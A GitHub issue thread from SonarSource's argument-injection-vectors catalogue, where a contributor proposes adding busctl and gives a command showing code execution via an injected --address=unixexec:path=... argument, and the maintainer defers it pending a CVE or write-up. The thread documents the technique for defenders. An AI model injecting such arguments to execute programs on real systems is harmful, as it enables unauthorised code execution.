argument-injection-vectors icon indicating copy to clipboard operation
argument-injection-vectors copied to clipboard
verified publisher icon SonarSource

Add busctl

Open randomstuff opened this issue 2 years ago • 3 comments

Arbitrary code execution through busctl --address=unixexec:...:

busctl set-property org.freedesktop.systemd1 /org/freedesktop/systemd1 org.freedesktop.systemd1.Manager LogLevel s debug --address=unixexec:path=firefox,argv1=https://www.example.com

randomstuff avatar Jun 08 '23 20:06 randomstuff

Hey, thank you for your contribution! Are you aware of CVEs or writeups showing this vector?

thomas-chauchefoin-sonarsource avatar Jun 12 '23 15:06 thomas-chauchefoin-sonarsource

No, I'm not aware of any real world exploitation of this feature.

randomstuff avatar Jun 12 '23 20:06 randomstuff

I'll keep the PR open for now then. I'm trying to add only vectors documented in a CVE or in a write-up to avoid colliding with GTFOBins. Thanks again for the PR and please ping me if you ever see this vector used somewhere!

thomas-chauchefoin-sonarsource avatar Jun 13 '23 16:06 thomas-chauchefoin-sonarsource